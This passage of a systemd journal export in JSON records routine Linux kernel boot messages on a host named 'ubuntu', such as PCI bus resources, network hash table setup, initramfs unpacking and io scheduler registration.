Plug and Play ACPI device, IDs PNP0700 (active)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=132;b=e2b08827b5804427b422c10c84f1567e;m=56a1ed;t=5bd16dd1a2155;x=49979f895bc17be0", "__REALTIME_TIMESTAMP" : "1615280779960661", "__MONOTONIC_TIMESTAMP" : "5677549", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:04", "_UDEV_SYSNAME" : "00:04", "_SOURCE_MONOTONIC_TIMESTAMP" : "409905", "MESSAGE" : "pnp 00:04: Plug and Play ACPI device, IDs PNP0501 (active)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=133;b=e2b08827b5804427b422c10c84f1567e;m=56a1fc;t=5bd16dd1a2163;x=82c61eaf87e091e3", "__REALTIME_TIMESTAMP" : "1615280779960675", "__MONOTONIC_TIMESTAMP" : "5677564", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "410192", "MESSAGE" : "pnp: PnP ACPI: found 5 devices" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=134;b=e2b08827b5804427b422c10c84f1567e;m=56a208;t=5bd16dd1a216f;x=b32a5fd21dfbf6c0", "__REALTIME_TIMESTAMP" : "1615280779960687", "__MONOTONIC_TIMESTAMP" : "5677576", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "418312", "MESSAGE" : "clocksource: acpi_pm: mask: 0xffffff max_cycles: 0xffffff, max_idle_ns: 2085701024 ns" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=135;b=e2b08827b5804427b422c10c84f1567e;m=56a2b2;t=5bd16dd1a221a;x=71898ba80ca4cc7d", "__REALTIME_TIMESTAMP" : "1615280779960858", "__MONOTONIC_TIMESTAMP" : "5677746", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "423093", "MESSAGE" : "pci_bus 0000:00: resource 4 [io 0x0000-0x0cf7 window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=136;b=e2b08827b5804427b422c10c84f1567e;m=56a327;t=5bd16dd1a228f;x=9f1677c6e475c2ad", "__REALTIME_TIMESTAMP" : "1615280779960975", "__MONOTONIC_TIMESTAMP" : "5677863", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "423094", "MESSAGE" : "pci_bus 0000:00: resource 5 [io 0x0d00-0xffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=137;b=e2b08827b5804427b422c10c84f1567e;m=56a3c5;t=5bd16dd1a232d;x=9c27a678ac93cc5c", "__REALTIME_TIMESTAMP" : "1615280779961133", "__MONOTONIC_TIMESTAMP" : "5678021", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "423095", "MESSAGE" : "pci_bus 0000:00: resource 6 [mem 0x000a0000-0x000bffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=138;b=e2b08827b5804427b422c10c84f1567e;m=56a44b;t=5bd16dd1a23b3;x=d0ab404cb0387262", "__REALTIME_TIMESTAMP" : "1615280779961267", "__MONOTONIC_TIMESTAMP" : "5678155", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "423096", "MESSAGE" : "pci_bus 0000:00: resource 7 [mem 0x80000000-0xfebfffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=139;b=e2b08827b5804427b422c10c84f1567e;m=56a4c1;t=5bd16dd1a2428;x=722c89e8012a5aec", "__REALTIME_TIMESTAMP" : "1615280779961384", "__MONOTONIC_TIMESTAMP" : "5678273", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "423097", "MESSAGE" : "pci_bus 0000:00: resource 8 [mem 0x100000000-0x17fffffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=13a;b=e2b08827b5804427b422c10c84f1567e;m=56a4d3;t=5bd16dd1a243a;x=114a06ded6048837", "__REALTIME_TIMESTAMP" : "1615280779961402", "__MONOTONIC_TIMESTAMP" : "5678291", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "423173", "MESSAGE" : "NET: Registered protocol family 2" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=13b;b=e2b08827b5804427b422c10c84f1567e;m=56a4de;t=5bd16dd1a2446;x=3e6d81c3cbbcd13", "__REALTIME_TIMESTAMP" : "1615280779961414", "__MONOTONIC_TIMESTAMP" : "5678302", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "425901", "MESSAGE" : "TCP established hash table entries: 16384 (order: 5, 131072 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=13c;b=e2b08827b5804427b422c10c84f1567e;m=56a4fc;t=5bd16dd1a2463;x=6147d9603b4d9b", "__REALTIME_TIMESTAMP" : "1615280779961443", "__MONOTONIC_TIMESTAMP" : "5678332", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "429777", "MESSAGE" : "TCP bind hash table entries: 16384 (order: 6, 262144 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=13d;b=e2b08827b5804427b422c10c84f1567e;m=56a516;t=5bd16dd1a247d;x=97f84b1d02a96c2f", "__REALTIME_TIMESTAMP" : "1615280779961469", "__MONOTONIC_TIMESTAMP" : "5678358", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "433287", "MESSAGE" : "TCP: Hash tables configured (established 16384 bind 16384)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=13e;b=e2b08827b5804427b422c10c84f1567e;m=56a520;t=5bd16dd1a2487;x=d4e96f4c933619c5", "__REALTIME_TIMESTAMP" : "1615280779961479", "__MONOTONIC_TIMESTAMP" : "5678368", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "436714", "MESSAGE" : "UDP hash table entries: 1024 (order: 3, 32768 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=13f;b=e2b08827b5804427b422c10c84f1567e;m=56a52a;t=5bd16dd1a2491;x=41b21a0bbc5a2cab", "__REALTIME_TIMESTAMP" : "1615280779961489", "__MONOTONIC_TIMESTAMP" : "5678378", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "439824", "MESSAGE" : "UDP-Lite hash table entries: 1024 (order: 3, 32768 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=140;b=e2b08827b5804427b422c10c84f1567e;m=56a534;t=5bd16dd1a249b;x=73da792df9470e3e", "__REALTIME_TIMESTAMP" : "1615280779961499", "__MONOTONIC_TIMESTAMP" : "5678388", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "443248", "MESSAGE" : "NET: Registered protocol family 1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=141;b=e2b08827b5804427b422c10c84f1567e;m=56a5c7;t=5bd16dd1a252e;x=658e67453d376da9", "__REALTIME_TIMESTAMP" : "1615280779961646", "__MONOTONIC_TIMESTAMP" : "5678535", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:00.0", "_UDEV_SYSNAME" : "0000:00:00.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "445582", "MESSAGE" : "pci 0000:00:00.0: Limiting direct PCI/PCI transfers" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=142;b=e2b08827b5804427b422c10c84f1567e;m=56a65c;t=5bd16dd1a25c3;x=595f41ddd1f2a821", "__REALTIME_TIMESTAMP" : "1615280779961795", "__MONOTONIC_TIMESTAMP" : "5678684", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.0", "_UDEV_SYSNAME" : "0000:00:01.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "448568", "MESSAGE" : "pci 0000:00:01.0: PIIX3: Enabling Passive Release" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=143;b=e2b08827b5804427b422c10c84f1567e;m=56a704;t=5bd16dd1a266c;x=75d157c138f23e2c", "__REALTIME_TIMESTAMP" : "1615280779961964", "__MONOTONIC_TIMESTAMP" : "5678852", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.0", "_UDEV_SYSNAME" : "0000:00:01.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "451465", "MESSAGE" : "pci 0000:00:01.0: Activating ISA DMA hang workarounds" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=144;b=e2b08827b5804427b422c10c84f1567e;m=56a712;t=5bd16dd1a2679;x=3a7b2a2a2ef66c73", "__REALTIME_TIMESTAMP" : "1615280779961977", "__MONOTONIC_TIMESTAMP" : "5678866", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "4", "_SOURCE_MONOTONIC_TIMESTAMP" : "479755", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKD] enabled at IRQ 11" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=145;b=e2b08827b5804427b422c10c84f1567e;m=56a78b;t=5bd16dd1a26f3;x=31bf186027993c3d", "__REALTIME_TIMESTAMP" : "1615280779962099", "__MONOTONIC_TIMESTAMP" : "5678987", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "507251", "MESSAGE" : "pci 0000:00:02.0: Video device with shadowed ROM at [mem 0x000c0000-0x000dffff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=146;b=e2b08827b5804427b422c10c84f1567e;m=56a799;t=5bd16dd1a2700;x=21fcaca2e8065e0f", "__REALTIME_TIMESTAMP" : "1615280779962112", "__MONOTONIC_TIMESTAMP" : "5679001", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_SOURCE_MONOTONIC_TIMESTAMP" : "511431", "MESSAGE" : "PCI: CLS 0 bytes, default 64" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=147;b=e2b08827b5804427b422c10c84f1567e;m=56a7a4;t=5bd16dd1a270b;x=e18d87de9a174e67", "__REALTIME_TIMESTAMP" : "1615280779962123", "__MONOTONIC_TIMESTAMP" : "5679012", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "511497", "MESSAGE" : "Unpacking initramfs..." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=148;b=e2b08827b5804427b422c10c84f1567e;m=56a7ae;t=5bd16dd1a2715;x=34e7746456cde406", "__REALTIME_TIMESTAMP" : "1615280779962133", "__MONOTONIC_TIMESTAMP" : "5679022", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "820583", "MESSAGE" : "Freeing initrd memory: 19144K" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=149;b=e2b08827b5804427b422c10c84f1567e;m=56a7d8;t=5bd16dd1a2740;x=5311d723c461c786", "__REALTIME_TIMESTAMP" : "1615280779962176", "__MONOTONIC_TIMESTAMP" : "5679064", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "822860", "MESSAGE" : "clocksource: tsc: mask: 0xffffffffffffffff max_cycles: 0x1e45270b174, max_idle_ns: 440795290368 ns" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=14a;b=e2b08827b5804427b422c10c84f1567e;m=56a7e4;t=5bd16dd1a274c;x=7be0fc3755f665ff", "__REALTIME_TIMESTAMP" : "1615280779962188", "__MONOTONIC_TIMESTAMP" : "5679076", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "827749", "MESSAGE" : "Scanning for low memory corruption every 60 seconds" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=14b;b=e2b08827b5804427b422c10c84f1567e;m=56a7ef;t=5bd16dd1a2757;x=3cb141ae816e568", "__REALTIME_TIMESTAMP" : "1615280779962199", "__MONOTONIC_TIMESTAMP" : "5679087", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "831232", "MESSAGE" : "Initialise system trusted keyrings" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=14c;b=e2b08827b5804427b422c10c84f1567e;m=56a7ff;t=5bd16dd1a2766;x=95dc4b6c01d1635b", "__REALTIME_TIMESTAMP" : "1615280779962214", "__MONOTONIC_TIMESTAMP" : "5679103", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "833536", "MESSAGE" : "Key type blacklist registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=14d;b=e2b08827b5804427b422c10c84f1567e;m=56a80a;t=5bd16dd1a2772;x=f83460486555e757", "__REALTIME_TIMESTAMP" : "1615280779962226", "__MONOTONIC_TIMESTAMP" : "5679114", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "835536", "MESSAGE" : "workingset: timestamp_bits=36 max_order=19 bucket_order=0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=14e;b=e2b08827b5804427b422c10c84f1567e;m=56a816;t=5bd16dd1a277d;x=c5140dbfdb532134", "__REALTIME_TIMESTAMP" : "1615280779962237", "__MONOTONIC_TIMESTAMP" : "5679126", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "839847", "MESSAGE" : "zbud: loaded" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=14f;b=e2b08827b5804427b422c10c84f1567e;m=56a821;t=5bd16dd1a2788;x=6aa5a866a54b4f6f", "__REALTIME_TIMESTAMP" : "1615280779962248", "__MONOTONIC_TIMESTAMP" : "5679137", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "841736", "MESSAGE" : "squashfs: version 4.0 (2009/01/31) Phillip Lougher" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=150;b=e2b08827b5804427b422c10c84f1567e;m=56a82b;t=5bd16dd1a2793;x=3c2d75adcdd0eb95", "__REALTIME_TIMESTAMP" : "1615280779962259", "__MONOTONIC_TIMESTAMP" : "5679147", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "844673", "MESSAGE" : "fuse init (API version 7.26)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=151;b=e2b08827b5804427b422c10c84f1567e;m=56a836;t=5bd16dd1a279e;x=28d57277178b50dc", "__REALTIME_TIMESTAMP" : "1615280779962270", "__MONOTONIC_TIMESTAMP" : "5679158", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "847472", "MESSAGE" : "Key type asymmetric registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=152;b=e2b08827b5804427b422c10c84f1567e;m=56a850;t=5bd16dd1a27b8;x=40d8d771ff08ccfa", "__REALTIME_TIMESTAMP" : "1615280779962296", "__MONOTONIC_TIMESTAMP" : "5679184", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "849648", "MESSAGE" : "Asymmetric key parser 'x509' registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=153;b=e2b08827b5804427b422c10c84f1567e;m=56a85b;t=5bd16dd1a27c3;x=317efab2144cd854", "__REALTIME_TIMESTAMP" : "1615280779962307", "__MONOTONIC_TIMESTAMP" : "5679195", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "852179", "MESSAGE" : "Block layer SCSI generic (bsg) driver version 0.4 loaded (major 246)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=154;b=e2b08827b5804427b422c10c84f1567e;m=56a866;t=5bd16dd1a27cd;x=fdb3901705b7c0c9", "__REALTIME_TIMESTAMP" : "1615280779962317", "__MONOTONIC_TIMESTAMP" : "5679206", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "856083", "MESSAGE" : "io scheduler noop registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=155;b=e2b08827b5804427b422c10c84f1567e;m=56a870;t=5bd16dd1a27d8;x=3ae086dee1bc9bf0", "__REALTIME_TIMESTAMP" : "1615280779962328", "__MONOTONIC_TIMESTAMP" : "5679216", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "858210", "MESSAGE" : "io scheduler deadline registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=156;b=e2b08827b5804427b422c10c84f1567e;m=56a87e;t=5bd16dd1a27e6;x=a7bf049c758daa9c", "__REALTIME_TIMESTAMP" : "1615280779962342", "__MONOTONIC_TIMESTAMP" : "5679230", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "860598", "MESSAGE" : "io scheduler cfq registered (default)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=157;b=e2b08827b5804427b422c10c84f1567e;m=56a889;t=5bd16dd1a27f0;x=62b6dd90bf32f5c", "__REALTIME_TIMESTAMP" : "1615280779962352", "__MONOTONIC_TIMESTAMP" : "5679241", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_SOURCE_MONOTONIC_TIMESTAMP" : "863243", "MESSAGE" : "intel_idle: Please enable MWAIT in BIOS SETUP" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=158;b=e2b08827b5804427b422c10c84f1567e;m=56a894;t=5bd16dd1a27fb;x=9579224210b193a0", "__REALTIME_TIMESTAMP" : "1615280779962363", "__MONOTONIC_TIMESTAMP" : "5679252", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", 